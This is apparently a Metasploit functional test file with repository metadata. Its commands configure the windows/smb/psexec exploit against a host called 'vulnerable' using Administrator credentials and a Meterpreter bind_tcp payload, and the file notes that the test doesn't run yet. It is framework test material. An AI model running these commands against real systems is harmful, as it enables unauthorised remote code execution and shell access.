Files
metasploit-gs/test/functional/framework/msftest/psexec.msftest
T
Jonathan Cran 2ff36a624d work around meterpreter input bug for now
git-svn-id: file:///home/svn/framework3/trunk@11736 4d416f70-5f16-0410-b530-b9f4589650da
2011-02-09 21:13:29 +00:00

27 lines
478 B
Plaintext

<xml>
<msf_test>
<name>
psexec
</name>
<description>
This test sets up psexec on a vulnerable host. (doesn't run currently - bug)
</description>
<commands>
use windows/smb/psexec
set WORKSPACE default
set RHOST vulnerable
set SMBUser Administrator
set SMBPass
set payload windows/meterpreter/bind_tcp
exit
</commands>
<output>
<successes>
</successes>
<failures>
</failures>
<failure_exceptions>
</failure_exceptions>
</output>
<msf_test>